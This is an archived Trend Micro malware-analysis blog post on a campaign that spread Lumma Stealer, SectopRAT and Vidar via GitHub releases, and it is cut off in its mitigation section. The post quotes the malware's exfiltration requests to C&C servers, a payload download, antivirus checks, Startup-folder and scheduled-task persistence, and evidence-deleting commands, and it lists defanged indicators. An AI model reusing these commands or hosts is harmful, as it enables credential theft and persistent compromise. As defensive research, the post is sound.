{ "id": "c00f8db5-fc5d-4a8f-b9fa-a093cc85356a", "created_at": "2026-04-06T00:13:08.390836Z", "updated_at": "2026-04-10T03:36:47.891026Z", "deleted_at": null, "sha1_hash": "0d645c4d3da53df7d1923854d03d98668c82db59", "title": "Lumma Stealer’s GitHub-Based Delivery Explored via Managed Detection and Response", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1316796, "plain_text": "Lumma Stealer’s GitHub-Based Delivery Explored via Managed\r\nDetection and Response\r\nPublished: 2025-01-30 · Archived: 2026-04-05 13:14:26 UTC\r\nSummary\r\nTrend Micro’s Managed XDR team investigated a campaign distributing Lumma Stealer through GitHub, abusing the\r\nplatform's release infrastructure to deliver various malware that included SectopRAT, Vidar, and Cobeacon.\r\nThe attackers used GitHub release infrastructure for initial access, with users downloading files from secure URLs.\r\nThese files exfiltrated sensitive data and connected to external C\u0026C servers, executing commands to avoid detection.\r\nLumma Stealer, along with other malware variants, dropped and executed additional tools, generating multiple\r\ndirectories and staging data. Techniques such as PowerShell scripts and Shell commands were used for persistence\r\nand data exfiltration.\r\nThe tactics, techniques, and procedures used in the incidents display overlap with those used by the Stargazer Goblin\r\ngroup, which is known for using compromised websites and GitHub for payload distribution. Analysis revealed\r\nconsistent URL patterns and compromised legitimate websites for redirection to GitHub-hosted malicious payloads.\r\nProactively implementing security best practices and recommendations will help organizations strengthen their\r\ndefenses against threats like Lumma Stealer. This includes validating URLs and files before downloading, regularly\r\nverifying digital certificates,  and using endpoint security solutions that can detect and prevent malicious activities.\r\nIntroduction\r\nTrend Micro™ Managed XDRservices  uncovered a sophisticated campaign involving Lumma Stealer, an information-stealing malware, that was being distributed through GitHub's release infrastructure. The investigation revealed that\r\nmalicious actors exploited GitHub as a trusted platform to deliver the stealer, which subsequently initiated additional\r\nmalicious activities. It then downloaded and executed other threats, including SectopRAT (a remote access trojan), Vidar,\r\nCobeacon, and another Lumma Stealer variant.\r\nThe campaign exhibits significant overlaps with tactics attributed to the Stargazer Goblin group, a threat actor that uses\r\ncompromised websites and GitHub repositories for payload distribution. Variations in the infection chain and payload usage\r\nfurther demonstrate the group's adaptability and evolving methods.\r\nThis blog dissects the tactics, techniques and procedures (TTPs) employed in these attacks, highlighting the critical role of\r\ncyber threat intelligence in uncovering the attacker’s strategies.\r\nInitial Access\r\nIn two separate Lumma Stealer cases, we traced the initial access point to file downloads from GitHub’s release\r\ninfrastructure. In one instance, a user downloaded a file named Pictore.exe via the Google Chrome browser, with the URL\r\npointing to a GitHub-hosted release asset stored on a cloud service provider. Similarly, another case we investigated\r\ninvolved the download of App_aeIGCY3g.exe, which was also temporarily hosted through GitHub's release mechanism.\r\nThese incidents showcase the attacker’s tactic of exploiting trusted platforms like GitHub for distributing malicious files.\r\nFigure 1. Downloading the Lumma Stealer binary Pictore.exe from its Github repository\r\nBoth files were originally signed by ConsolHQ LTD and Verandah Green Limited (on December 6 and December 12, 2024,\r\nrespectively). However, their certificates have since been explicitly revoked by the issuer, signaling that the files are now\r\ndeemed untrustworthy and potentially malicious.\r\nThe GitHub URL strings extracted from the telemetry are as follows:\r\nhttps[:]//objects.githubusercontent[.]com/github-production-release-asset-2e65be/898537481/194f6acb-d420-4d97-b7c1-\r\n01741d4bc184?X-Amz-Algorithm=AWS4-HMAC-SHA256\u0026X-Amz-Credential=releaseassetproduction%2F20241204%2Fus-east-1%2Fs3%2Faws4_request\u0026X-Amz-Date=20241204T193520Z\u0026X-Amz-Expires=300\u0026X-Amz-Signature=80e7a9318067557b21a24d1906ab3f05a5f250eb63dde4dd8a3335908953a46a\u0026X-Amz-SignedHeaders=host\u0026response-content-disposition=attachment%3B%20filename%3DPictore.exe\u0026response-content-type=application%2Foctet-stream\r\nhttps://www.trendmicro.com/en_us/research/25/a/lumma-stealers-github-based-delivery-via-mdr.html\r\nPage 1 of 15\n\nIn this example, the URL provides temporary, secure access to download a file named Pictore.exe from GitHub's release\r\nasset storage, with the X-Amz-Expires parameter indicating that the URL is valid only for a duration of 300 seconds (5\r\nminutes). The use of pre-signed URLs further suggests that the file is part of a release associated with a specific GitHub\r\nrepository, ensuring that the download is authenticated and time-limited.\r\nExecution\r\nWe identified the files Pictore.exe and App_aeIGCY3g.exe as Lumma Stealer, an information-stealing malware designed to\r\nexfiltrate sensitive information—such as credentials, cryptocurrency wallets, system information, and files—while\r\ncommunicating with attacker-controlled servers to facilitate further malicious activities. Since both files exhibit the same\r\nbehavior, this blog entry will focus primarily on the data gathered from Pictore.exe.\r\nThe execution of Pictore.exe generates the following files:\r\nnsis7z.dll\r\napp-64.7z\r\nSystem.dll\r\nnse2869.tmp\r\nnsu27DC.tmp\r\nThe dropped file C:\\Users\\\u003cusername\u003e\\AppData\\Local\\Temp\\1\\nse2869.tmp\\nsis7z.dll is a 7zip archiving tool used to\r\nextract files from the archive C:\\Users\\\u003cusername\u003e\\AppData\\Local\\Temp\\1\\nse2869.tmp\\app-64.7z.\r\nFigure 2. The 7zip tool nsis7z.dll extracting the files from app-64.7z.\r\nThe files from the app-64.7z archive is extracted to the directory C:\\Users\\\r\n\u003cusername\u003e\\AppData\\Local\\Temp\\1\\nse2869.tmp\\7z-out\\, which contains Lumma Stealer and its components. These files\r\nsuggest that the malicious executable is either built using Electron (which uses Chromium for rendering) or is itself a\r\nChromium-based application.\r\nElectron apps, by default, bundle Chromium with the app to render the graphical user interface.  The use of Chromium\r\nresources like .pak files and V8 snapshots also indicate that the app could be an Electron app.\r\nhttps://www.trendmicro.com/en_us/research/25/a/lumma-stealers-github-based-delivery-via-mdr.html\r\nPage 2 of 15\n\nFigure 3. Extracted files from app-64.7z\r\nWe observed Pictore.exe connecting to two external IP addresses, likely their command-and-control (C\u0026C) servers —\r\n192[.]142[.]10[.]246:80 and 192[.]178[.]54[.]36:443. Meanwhile, App_aeIGCY3g.exe connected to 84[.]200[.]24[.]26 via\r\nport 80.\r\nFigure 4. Pictore.exe connecting to external IP addresses\r\nExamining our Trend Vision One™one-platform  telemetry, we uncovered the following HTTP request to the external IP\r\naddress 192[.]142[.]10[.]246 and 84[.]200[.]24[.]26:\r\nGET hxxp://192[.]142[.]10[.]246/login.php?\r\nevent=init\u0026id=Y3VjdW1iZXI=\u0026data=MTYgR0JfW29iamVjdCBPYmplY3RdX01pY3Jvc29mdCBCYXNpYyBEaXNwbGF5IEFkYXB0ZXJfdHJ1ZV8\r\nGET hxxp://84[.]200[.]24[.]26/login.php?\r\nevent=init\u0026id=dW5kZXJza2lydA==\u0026data=MTYgR0JfW29iamVjdCBPYmplY3RdX01pY3Jvc29mdCBCYXNpYyBEaXNwbGF5IEFkYXB0ZXJfdHJ1\r\n200\r\nThe decoded URL strings results in the following:\r\nhxxp://192[.]142[.]10[.]246/login.php?event=init\u0026id=cucumber=\u0026data=16 GB_[object Object]_Microsoft Basic Display\r\nAdapter_true_1400x1050_Windows 10 Pro_3 minutes (0.06 hours)_C:\\Users\\\u003cusername\u003e_DESKTOP-\r\n\u003ccomputername\u003e_\u003cusername\u003e_Windows_NT_x64_10.0.19044_C:\\Users\\\u003cusername\u003e\\AppData\\Roaming_C:\\Users\\\r\n\u003cusername\u003e\\AppData\\Local\\Temp_DESKTOP-\u003ccomputername\u003e__Intel64 Family 6 Model 85 Stepping 7,\r\nhttps://www.trendmicro.com/en_us/research/25/a/lumma-stealers-github-based-delivery-via-mdr.html\r\nPage 3 of 15\n\nGenuineIntel_AMD64_C:_4_C:\\Users\\\r\n\u003cusername\u003e\\AppData\\Local\\Temp\\2plETWG35EwayNsFpWCMWrwvVrg\\Pictore.exe\r\nGET hxxp://84[.]200[.]24[.]26/login.php?event=init\u0026id=underskirt==\u0026data=16 GB_[object Object]_Microsoft Basic\r\nDisplay Adapter_true_1280x960_Windows 10 Pro_3 minutes (0.06 hours)_C:\\Users\\\u003cusername\u003e_DESKTOP-\r\n\u003ccomputername\u003e_\u003cusername\u003e_Windows_NT_x64_10.0.19044_C:\\Users\\\u003cusername\u003e\\AppData\\Roaming_C:\\Users\\\r\n\u003cusername\u003e\\AppData\\Local\\Temp_DESKTOP-\u003ccomputername\u003e__Intel64 Family 6 Model 85 Stepping 7,\r\nGenuineIntel_AMD64_C:_4_C:\\Users\\\u003cusername\u003e\\AppData\\Local\\Temp\\2pprtBdjzhf5iVtTfAJT5aNsRxD\\Scielfic.exe\r\nThe strings show that the malware collected system information, including RAM size, display adapter, OS version,\r\nhostname, uptime, user directory paths, and temporary directory content. It then likely exfiltrated this data to the attacker-controlled servers (192[.]142[.]10[.]246 and 84[.]200[.]24[.]26).\r\nThe following Shell command lines were spawned by Pictore.exe (as well as App_aeIGCY3g.exe): \r\nCommand line Details\r\nPictore.exe --type=utility --utility-sub-type=network.mojom.NetworkService\r\n--lang=en-US --service-sandbox-type=none --user-data-dir=\"C:\\Users\\\r\n\u003credacted\u003e\\AppData\\Roaming\\qfwbhfiixlbsvkug\"\r\n--mojo-platform-channel-handle=2472 --field-trial-handle=1996,i,16339862247624116936,\r\n1579335656413102094,131072 --\r\ndisablefeatures=\r\nSpareRendererForSitePerProcess,\r\nWinRetrieveSuggestionsOnlyOnDemand /prefetch:8\r\nThe command gathers GPU Information such as\r\nVendor ID, device ID, and driver version, among\r\nothers. It disables GPU sandboxing to assist in\r\navoiding detection via security software that\r\nmight monitor GPU processes. It checks the GPU\r\nconfiguration to detect if it is running in a\r\nvirtualized environment (which is common in\r\nsecurity labs and sandboxes).\r\nPictore.exe --type=utility --utility-sub-type=network.mojom.NetworkService\r\n--lang=en-US --service-sandbox-type=none --user-data-dir=\"C:\\Users\\\r\n\u003credacted\u003e\\AppData\\Roaming\\qfwbhfiixlbsvkug\"\r\n--mojo-platform-channel-handle=2472 --field-trial-handle=1996,i,16339862247624116936,\r\n1579335656413102094,131072 --\r\ndisable-features=\r\nSpareRendererForSitePerProcess,\r\nWinRetrieveSuggestionsOnlyOnDemand\r\n/prefetch:8\r\nThe command gathers network-related\r\ninformation, such as service and platform\r\nchannel handles, to establish communication with\r\nmalicious services. It disables certain features to\r\navoid detection and enhance the functionality of\r\nthe Lumma Stealer. It configures a custom user\r\ndata directory for storing or staging data. Uses\r\nspecific flags to bypass sandboxing mechanisms\r\nand potentially evade security monitoring tools\r\nPictore.exe --type=gpu-process --user-data-dir=\"C:\\Users\\\r\n\u003credacted\u003e\\AppData\\Roaming\\qfwbhfiixlbsvkug\" --gpu-\r\n\"preferences=UAAAAAAAAADgAAAYAAAAA\r\nAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAA\r\nAAAAAQAAAAAAAAAAAAAAA\r\nAAAAAAAAAABgAAAAAAAAA\r\nGAAAAAAAAAAIAAAAAAAAAAgAAAAAAAA\r\nACAAAAAAAAAA=\r\n--mojo-platform-channel-handle=2000 --field-trial-handle=\r\n1996,i,16339862247624116936,1579335656413102094,131072 --\r\ndisable-features=SpareRendererForSitePerProcess,\r\nWinRetrieveSuggestionsOnlyOnDemand /prefetch:2\r\nThe command gathers GPU preferences to adjust\r\nsystem behavior for evasion, employs a custom\r\nuser-data directory for staging data, and disables\r\nfeatures to bypass detection. The encoded GPU\r\nsettings and platform handles indicate covert\r\ncommunication with attacker-controlled services,\r\nwhile avoiding security software.\r\npowershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -\r\nExecutionPolicy Unrestricted -Command -\r\nThe command launches PowerShell with\r\nunrestricted script execution, prevents loading of\r\nprofiles and logos, keeps the session open for\r\nfurther commands, and allows the execution of\r\nadditional code via the pipeline (often used for\r\nstealthy or malicious activities).\r\nC:\\Windows\\system32\\cmd.exe /d /s /c \"findstr /C:\"Detected boot\r\nenvironment\" \"%windir%\\Panther\\setupact.log\"\"\r\nThe command searches the setupact.log file for\r\nthe phrase \"Detected boot environment\" using the\r\nfindstr command. It is typically used to check the\r\nsystem's boot environment during the setup or\r\nhttps://www.trendmicro.com/en_us/research/25/a/lumma-stealers-github-based-delivery-via-mdr.html\r\nPage 4 of 15\n\ninstallation process, potentially to gather\r\ninformation about the system state for\r\nreconnaissance.\r\nC:\\Windows\\system32\\cmd.exe /d /s /c \"echo\r\n%COMPUTERNAME%.%USERDNSDOMAIN%\"\r\nThe command echoes the computer's fully\r\nqualified domain name (FQDN), which is a\r\ncombination of the computer name\r\n(%COMPUTERNAME%) and the DNS domain\r\n(%USERDNSDOMAIN%). It is typically used to\r\ngather information on the system's network\r\nconfiguration, specifically the machine's name\r\nand domain.\r\nC:\\Windows\\system32\\cmd.exe /d /s /c \"chcp\"\r\nThe command sets the active code page number\r\nin the command prompt. It can be used to ensure\r\nthat the malware operates correctly in\r\nenvironments with different regional settings.\r\nTable 1. Shell command lines\r\nSectopRAT, Vidar, and Lumma Stealer\r\nWe discovered that the initial Lumma Stealer files, Pictore.exe and App_aeIGCY3g.exe, dropped various tools and malware\r\nsuch as SeptopRAT, Vidar, Cobeacon, and another Lumma Stealer variant on the affected machines. These were created\r\nwithin randomly-named (and likely dynamically generated) folders in the temp directory, after which they were\r\nsubsequently executed.\r\nThe following SectopRAT files were created:\r\nC:\\Windows\\system32\\cmd.exe /d /s /c \"\"C:\\Users\\\r\n\u003cusername\u003e\\AppData\\Local\\Temp\\1\\yVUCCXe3c5E4qLcCd4\\PillsHarvest.exe\"\"\r\nC:\\Windows\\system32\\cmd.exe /d /s /c \"\"C:\\Users\\\r\n\u003cusername\u003e\\AppData\\Local\\Temp\\1\\yVUCCXe3c5E4qLcCd4\\BelfastProt.exe\"\"\r\nC:\\Windows\\system32\\cmd.exe /d /s /c \"\"C:\\Users\\\r\n\u003cusername\u003e\\AppData\\Local\\Temp\\cxCzdFWzpj8waIrVyr\\HumanitarianProvinces.exe””\r\nC:\\Windows\\system32\\cmd.exe /d /s /c \"\"C:\\Users\\\r\n\u003cusername\u003e\\AppData\\Local\\Temp\\2pprtBdjzhf5iVtTfAJT5aNsRxD\\Scielfic.exe””\r\nNote that since all the SectopRAT files exhibited the same behavior, we will focus on the file HumanitarianProvinces.exe\r\nfor our analysis.\r\nUpon execution, HumanitarianProvinces.exe generated multiple randomly-named directories within the temp directory\r\nlocated in C:\\Users\\\u003cuser\u003e\\AppData\\Local\\Temp\\. This following are some examples of these directories:\r\nNow, Eternal, Pressing, Recommend, Sen, Schema, Openings, Access, Earn, Signup, Cheats, Gift, Silver, Statutory,\r\nReprints, Rwanda, Brain, Advertiser, Inventory, Herald, Restricted, Sheer, Baghdad, Memories, Spent, Fever.\r\nIt then renamed the file Signup to Signup.cmd, changing its extension to .cmd, to enable straightforward execution using the\r\nfollowing commands:\r\nCLI command: \"C:\\Windows\\System32\\cmd.exe\" /c copy Signup Signup.cmd \u0026\u0026 Signup.cmd\r\nThe script includes a command that concatenates multiple files from the temp directory into a single file (t). It appears to\r\ncopy some of the files it drops and checks specific files on the machine. The commands combine multiple files into a single\r\nbinary, creates directories for staging purposes, introduces delays to evade detection or synchronization, and performs\r\nreconnaissance.\r\nCommand Description\r\nchoice /d y /t 5\r\nAutomatically selects the\r\ndefault option (\"y\") after a 5-\r\nsecond delay. \r\ncmd  /c copy /b ..\\Sen + ..\\Silver + ..\\Reprints + ..\\Cheats + ..\\Gift + ..\\Openings +\r\n..\\Rwanda + ..\\Statutory + ..\\Schema + ..\\Baghdad + ..\\Inventory + ..\\Recommend +\r\n..\\Earn + ..\\Eternal + ..\\Access t\r\nConcatenates the previously\r\ncreated files from parent\r\ndirectories into a single binary\r\nfile named 't' in the current\r\ndirectory.\r\nhttps://www.trendmicro.com/en_us/research/25/a/lumma-stealers-github-based-delivery-via-mdr.html\r\nPage 5 of 15\n\nfindstr /V \"LOCKLANESTHICKCAPTAINSPOTCMSFAVOURITEASSESSED\"\r\nAdvertiser\r\nSearches for lines in the file\r\n‘Advertiser’ that do not\r\ncontain any of the specified\r\nwords/phrases.\r\ncmd /c md 201626\r\nCreates a new directory\r\nnamed 201626 in the current\r\nworking directory.\r\nfindstr \"AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth\"\r\nSearches for the presence of\r\nprocesses or services related\r\nto antivirus or security\r\nsoftware.\r\ntasklist\r\nDisplays a list of currently\r\nrunning processes on the\r\nsystem.\r\nfindstr /I \"wrsa opssvc\"\r\nSearches for case-insensitive\r\nmatches for the terms \"wrsa\"\r\nor \"opssvc\" related to\r\nantivirus or security software.\r\nDenmark.com t\r\nDenmark.com (an AutoIt\r\nscript) executes the binary file\r\n‘t’ created from the\r\nconcatenated files. In other\r\ncases, it was Sports.com,\r\nPrivilege.com, Fabric.com.\r\nTable 2. Script commands\r\nCreated directory: C:\\Users\\\u003cusername\u003e\\AppData\\Local\\Temp\\201626\r\nCreated file: C:\\Users\\\u003cusername\u003e\\AppData\\Local\\Temp\\201626\\Denmark.com\r\nThe execution of Denmark.com (AutoIt3.exe) seen in the actions described in these logs indicate a sophisticated attack that\r\naims to conduct data exfiltration, establish persistence, and further compromise target machines. It accomplishes this by\r\ncreating startup entries, copying sensitive information like browser cookies and using legitimate tools like RegAsm.exe for\r\nprocess injection to connect to the C\u0026C server (91[.]202[.]233[.]18).\r\nGET hxxp://91[.]202[.]233[.]18:9000/wbinjget?q=B2E581C85432BD4DF6A59A00CBDA1CB3\r\nFigure 5. The chain of events in an attack involving SectoPRAT\r\nAs displayed in Figure 7, SectopRAT also copied Chrome browser data to the local temp folder\r\nC:\\Users\u003cuser\u003e\\AppData\\Local\\Google\\Chrome\\User Data. Malicious actors often copy this data to steal stored\r\ncredentials, session cookies, autofill information, and browsing history to enable account takeover, steal user identities, and\r\nperform further exploitation.\r\nWe also observed persistence being established through the Startup folder. The following command creates a .url file\r\n(shortcut) in the Windows Startup folder, ensuring that the script healthPulse.url runs on startup:\r\ncmd /k echo [InternetShortcut] \u003e \"C:\\Users\\\u003cusername\u003e\\AppData\\Roaming\\Microsoft\\Windows\\Start\r\nMenu\\Programs\\Startup\\HealthPulse.url\" \u0026 echo URL=\"C:\\Users\\\u003cusername\u003e\\AppData\\Local\\WellnessPulse\r\nSolutions\\HealthPulse.js\" \u003e\u003e \"C:\\Users\\\u003cusername\u003e\\AppData\\Roaming\\Microsoft\\Windows\\Start\r\nMenu\\Programs\\Startup\\HealthPulse.url\" \u0026 exit\r\nhttps://www.trendmicro.com/en_us/research/25/a/lumma-stealers-github-based-delivery-via-mdr.html\r\nPage 6 of 15\n\nHealthPulse.url is an internet shortcut file which executes the script HealthPulse.js. In turn, HealthPulse.js employs\r\nActiveX for the execution of the file HealthPulse.scr (autoit file).\r\nFigure 6. Content of the HealthPulse.js script\r\nFigure 7. Content of the HealthPulse.url file\r\nOn some affected machines, SectopRAT created scheduled tasks for persistence. As seen in the following command, a\r\nscheduled task named Lodging is set to execute the script Quantifyr.js every five minutes:\r\ncmd /c schtasks.exe /create /tn \"Lodging\" /tr \"wscript //B 'C:\\Users\\\u003cusername\u003e\\AppData\\Local\\Innovative Analytics\r\nSolutions\\Quantifyr.js'\" /sc minute /mo 5 /F\r\nThe initial actions of the DesignersCrawford.exe file, which we identified as the Vidar malware, are similar to the previously\r\nanalyzed files. This includes the creation of Privilege.com (AutoIt3.exe), which serves as a facilitator for Vidar’s operations,\r\nvia the following command:\r\nprocessCmd: Privilege.com  E\r\nobjectCmd: \"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe\" --remote-debugging-port=9223 --profile-directory=\"Default\"\r\nVidar launches Chrome, first instructing it to start with a specific remote debugging port (9223) enabled, and then to load the\r\ndefault user profile. The remote debugging port allows external processes (including attackers) to interact with the browser\r\ninstance.\r\nIt will then access and copy browser data and cloud storage data from Microsoft OneDrive and Discord to\r\nC:\\ProgramData\\S2VKXL68GLN7\\\u003c6 random char\u003e. This includes the following:\r\nDiscord LevelDB files, including data such as user activity, settings, or cached information used by Discord\r\nChrome user data, typically stored in the AppData\\Local\\Google\\Chrome\\User Data folder, and contains profiles,\r\nsession data, and cached files\r\nMicrosoft Edge profile data, including user preferences, cookies, and session data\r\nMozilla Firefox data, including encryption keys used in password storage, other secure data (e.g., certificates), and\r\nbackups.\r\nOneDrive synced files\r\nFigure 8. The chain of events in an attack involving Vidar\r\nWhile the data is being copied, an outbound connection is established to the remote server at 5[.]75[.]212[.]196:443, which\r\nis highly indicative of data exfiltration. This suggests that the attacker may be transferring the stolen information to a remote\r\nserver for further exploitation. Additionally, the system connects to the domain ikores[.]sbs, which is known to be associated\r\nwith Vidar.\r\nFor evasion, it deletes the directory C:\\ProgramData\\S2VKXL68GLN7 and all its content using the command rd /s /q. This\r\ncommand removes the specified directory and its subdirectories without a confirmation prompt, ensuring that any files or\r\ntraces within that folder are silently erased. The timeout /t 10 command at the start introduces a 10-second delay, which\r\ncould be used to avoid immediate detection or allow other processes to finish before the clean-up operation is executed.\r\nFinally, the exit command closes the command prompt, completing the process:\r\nCLI command: \"C:\\Windows\\system32\\cmd.exe\" /c timeout /t 10 \u0026 rd /s /q \"C:\\ProgramData\\S2VKXL68GLN7\" \u0026 exit\r\nWe discovered another dropped file ResetEngaging.exe, which we identified as a variant of Lumma Stealer. Like the other\r\ndropped files, ResetEngaging.exe creates a corresponding AutoIt3 file named Fabric.com to facilitate the malware:\r\nCLI command: Fabric.com V\r\nhttps://www.trendmicro.com/en_us/research/25/a/lumma-stealers-github-based-delivery-via-mdr.html\r\nPage 7 of 15\n\nThis command triggers a DNS query to lumdukekiy[.]shop (a domain associated with Lumma Stealer), which allows access\r\nto Chrome’s browser’s data at C:\\Users\u003cuser\u003e\\AppData\\Local\\Google\\Chrome\\User Data. This is done to gather\r\ninformation such as stored credentials, session cookies, autofill information, and browsing history.\r\nIt also creates a PowerShell script (GZ7BLVTR7HDJSNI8Z66BYYANMD.ps1) within the temp directory. This script contains\r\nobfuscated commands that attempt to contact legitimate external domains. These requests seem to serve as connectivity\r\nchecks, possibly ensuring that the compromised system can reach external servers before downloading additional payloads\r\nor receiving further instructions from the attacker's C\u0026C infrastructure.\r\nFigure 9. The chain of events in an attack involving the Lumma Stealer variant\r\nThe script downloads and extracts a ZIP file, which is saved to the temp directory from\r\nhxxps://klipcatepiu0[.]shop/int_clp_sha[.]txt. This ZIP file contains executable files, which are subsequently extracted and\r\nexecuted.\r\nInitial access attribution\r\nThe delivery methods observed in this campaign exhibits significant overlap with tactics attributed to the threat group\r\nStargazer Goblin (as outlined in Check Point Research's Atlantida Stealer campaign report from July 2024). While\r\ndistinctions exist in the infection chain order and specific implementation details, several key components are consistent:\r\nCompromised websites: used to deploy malicious PHP scripts for validation and redirection.\r\nGitHub repositories: used as a trusted platform to host and distribute payloads.\r\nRedirect infrastructure: tailored redirection mechanisms are employed to direct victims to malicious content.\r\nAnalysis of downloaded files in VirusTotal reveal an originating URL that the victim interacts with before being redirected\r\nto a malicious GitHub release section. From there, the user is able to download the payload.\r\nhttps://www.trendmicro.com/en_us/research/25/a/lumma-stealers-github-based-delivery-via-mdr.html\r\nPage 8 of 15\n\nFigure 10. App_aeIGCY3g.exe and Pictore.exe download redirection chain\r\nBy analyzing similar files submitted to VirusTotal, we observed a consistent pattern in the originating URL paths. Most of\r\nthese paths contained the string page, indicating a potential naming convention employed by the threat actor.\r\nSHA256 Originating URL(s) GitHub release asset\r\nde6fcdf58b22a51d26eacb0e2c992d\r\n9a894c1894b3c8d70\r\nf4db80044dacb7430\r\nhxxps://eaholloway[.]com\r\n/updatepage333\r\nhxxps://github[.]com\r\n/viewfilenow/Downloadnew/|\r\nreleases/download/3214214/Pictore.exe\r\nafdc1a1e1e934f18be28465315704a12\r\nb2cd43c186fbee94\r\nf7464392849a5ad0\r\nhxxps://afterpm[.]com\r\n/pricedpage/ hxxps://github[.]com/down4up/\r\n44/releases/download/\r\n33/App_aeIGCY3g.exe hxxps://enricoborino[.]com\r\n/propage66\r\nb87ff3da811a598c284997222e0b5a\r\n9b60b7f79206f8d795\r\n781db7b2abd41439\r\nhxxp://sacpools[.]com\r\n/pratespage\r\nhxxps://github[.]com/zabdownload/\r\nv14981950815/releases/download/\r\n23113123/Squarel_JhZjXa.exe\r\ncd207b81505f13d46d94b08fb5130dd\r\nae52bd1748856e6b474\r\n688e590933a718\r\nhxxps://startherehosting.net\r\n/todaypage\r\nhxxps://github[.]com/g1lsetup/iln7\r\n/releases/download/\r\n423425325/NanoPhanoTool.exe\r\nhxxps://kassalias[.]com\r\n/pageagain/\r\nhxxps://pmpdm[.]com\r\n/webcheck357\r\n823d37f852a655088bb4a81d2f3a8\r\nbfd18ea4f31e7117e5713\r\naeb9e0443ccd99\r\nhxxps://ageless-skincare[.]com/gn/\r\nhxxp://github[.]com/yesfound/worked\r\n/releases/download/\r\n1/QilawatProtone.exe\r\n380920dfcdec5d7704ad1af1ce35fe\r\nba7c3af1b68ffa4\r\n588b734647f28eeabb7\r\nhxxps://compass-point-yachts[.]com\r\n/nicepage77/pro77.php\r\nhxxps://github[.]com/down7/Settingup\r\n/releases/download/\r\nset/NativeApp_G5L1NHZZ.exe\r\nd8ae7fbb8db3b027a832be6f1acc4\r\n4c7f5aebfdcb306c\r\nd297f7c30f1594d9c45\r\nhxxps://pmpdm[.]com\r\n/webcheck/\r\nhxxps://github[.]com/JF6DEU/vrc121\r\n/releases/download/\r\n2025/X-essentiApp.ex_\r\nhxxps://github[.]com/g1lsetup/v2025\r\n/releases/download/\r\nex/X-essentiApp.exe\r\n15b195152a07bb22fec82aa5c90c7\r\nff44a10c0303446ce\r\n11f683094311a8916b\r\nhxxps://comicshopjocks[.]com\r\n/nicepage/pro.php\r\nhxxps://github[.]com/dowwnloader\r\n/FileSetup\r\n/releases/download/\r\n124124125/NativeApp_azgEO1k4.exe\r\n800c5cd5ec75d552f00d0aca42bda\r\nde317f12aa797103b93\r\n57d44962e8bcd37a\r\nhxxps://lakeplacidluxuryhomes[.]com\r\n/updatepage/\r\nhxxps://github[.]com/magupdate\r\n/Freshversion10/releases/download/\r\n12315151/NativeApp_01C02RhQ.exe\r\nhxxps://lakeplacidluxuryhomes[.]com\r\n/webpage37/\r\nhttps://www.trendmicro.com/en_us/research/25/a/lumma-stealers-github-based-delivery-via-mdr.html\r\nPage 9 of 15\n\nhxxps://lakeplacidluxuryhomes[.]com\r\n/pagenow/\r\n5550ea265b105b843f6b094979bfa\r\n0d04e1ee2d1607b2e0\r\nd210cd0dea8aab942\r\nhxxps://primetimeessentials[.]com\r\n/newpagyes/\r\nhxxps://github[.]com/kopersparan\r\n/Downloadable\r\n/releases/download/\r\n314/Paranoide.exe\r\n3e8ef8ab691f2d5b820aa7ac80504\r\n4e5c945d8adcfc51ee7\r\n9d875e169f925455\r\nhxxps://razorskigrips[.]com\r\n/newnewpage/\r\nhxxps://github[.]com/mp3andmovies\r\n/installer\r\n/releases/download/\r\nversoin4124/AevellaAi.2.exe\r\nTable 3. Similar files sourced from VirusTotal\r\nThe domains involved in the initial interaction are no longer accessible. However, snapshots from Internet Archive’s\r\nWayback Machine indicate that these were legitimate websites that were active for years, with some dating back to at least\r\n1999. These sites were compromised, allowing the threat actor to inject malicious pages and scripts for redirection and\r\nfacilitate the user's navigation to the GitHub-hosted malicious payloads.\r\nThe following files were commonly inserted by the threat actor to aid in the attack chain: an image file, such as\r\n/img/dwn.jpg or /img/download.jpg, which serves as a basic download image, and PHP scripts, such as /pro.php and\r\n/sleep.php, which are likely used to manage redirection or validate user interactions during the attack sequence.\r\nIn addition, we can see from one of the websites that it is built using WordPress, potentially highlighting a common\r\nvulnerability in the group’s exploitation strategy.\r\nFigure 11. One of the compromised websites built using WordPress\r\nMost of the GitHub accounts listed under the \"Originating URL\" section are no longer accessible and were likely taken\r\ndown due to hosting malicious files. However, two accounts remain active and still contain malicious releases:\r\nhxxps://github[.]com/magupdate – joined 12/04/2024\r\nhxxps://github[.]com/yesfound/ – joined 12/11/2024 \r\nhttps://www.trendmicro.com/en_us/research/25/a/lumma-stealers-github-based-delivery-via-mdr.html\r\nPage 10 of 15\n\nFigure 12. Malicious GitHub account repository and release name\r\nAn analysis of contribution activity for both accounts reveal minimal and specific actions:\r\nBoth accounts were newly created.\r\nTheir sole activities were creating a repository and releasing a malicious file.\r\nThe repository names used descriptive words followed by a number, and their Readme.md content partially or fully\r\nmirrors the repository name.\r\nhttps://www.trendmicro.com/en_us/research/25/a/lumma-stealers-github-based-delivery-via-mdr.html\r\nPage 11 of 15\n\nhttps://www.trendmicro.com/en_us/research/25/a/lumma-stealers-github-based-delivery-via-mdr.html\r\nPage 12 of 15\n\nFigure 13. The Readme.cmd content of the malicious Github Repositories\r\nWhile the tactics observed in this campaign closely align with those attributed to the threat group Stargazer Goblin, there are\r\nnotable differences in execution. The infection chain begins with compromised websites that redirect to malicious GitHub\r\nrelease links, using URLs frequently containing the string page, suggesting a deliberate naming convention.\r\nThe compromised domains, with at least one that was built using WordPress, were exploited to host redirection mechanisms,\r\nincluding basic image files and PHP scripts, potentially signaling a recurring vulnerability in the group's exploitation\r\nstrategy.\r\nThe GitHub accounts used in the campaign demonstrate minimal activity and were primarily focused on creating\r\nrepositories and hosting malicious releases. Both accounts exhibit highly specific behavior: creating descriptive repositories\r\nand releases, with the Readme.md content closely matching repository names. Unlike previous campaigns that relied on\r\nestablished GitHub accounts, these accounts show no reputation-building efforts.\r\nThe deployment of multiple malware families—including Lumma Stealer, Vidar, and SectopRAT—in a single infection\r\nreflects tactical evolution aimed at maximizing operational impact. These variations suggest deliberate adjustments by the\r\nthreat actor to evade detection and enhance operational flexibility.\r\nMitigation and recommendations\r\nOrganizations can consider implementing the following examples of threat mitigation best practices to minimize or\r\nprevent malware such as Lumma Stealer from impacting their systems:\r\nValidate URLs and files before downloading and executing them, especially from platforms that can be used to\r\npotentially host malware like GitHub.\r\nCarefully inspect 